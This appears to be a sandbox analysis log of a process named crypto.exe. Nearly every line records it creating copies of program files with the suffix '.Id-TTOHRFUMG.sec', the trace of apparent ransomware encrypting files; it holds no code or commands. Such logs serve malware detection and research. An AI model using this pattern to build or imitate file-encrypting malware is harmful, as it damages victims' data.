File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00527_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Moncton.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187895.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR34B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWRECC.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-US.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199727.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\BOMB.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mlp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Pushpin.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\ORG97.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\d3d9\libdirect3d9_filters_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\15x15dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ConvertToSync.m3u.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCINFO.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299763.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\MSOSEC.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222015.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBWZINT.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ml.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR29B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00703L.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Median.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00204_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART10.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Magadan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REPORT.CFG.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\.lastModified.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15034_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\utilityfunctions.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhds_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_standard_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosefont.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_livehttp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0098497.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105506.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01843_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199283.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0229385.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\BCSLaunch.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\.lastModified.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18256_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\SPACER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\sqlite.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14768_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libvdr_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\47.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15035_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107514.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00010_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\47.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287019.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7cm_en.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00694_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188511.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECURL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_increaseindent.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\msoe.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CMNTY_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUB6INTL.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.SE.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMARQ.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\BloodPressureTracker.xltx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESPS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL011.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libwinhibit_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.DE.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00116_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCARD11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\t2k.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\cmm\PYCC.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ROAD_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Premium.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\NBDoc.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Apex.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281632.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-lib-uihandler.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0300520.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00367_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212601.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\1033\OFFICE10.MML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLR.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\mr.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME24.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00458_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15072_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\slideShow.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00372_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWCUTLIN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NAMECONTROLPROXY.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain.wmv.Id-TTOHRFUMG.sec	crypto.exe
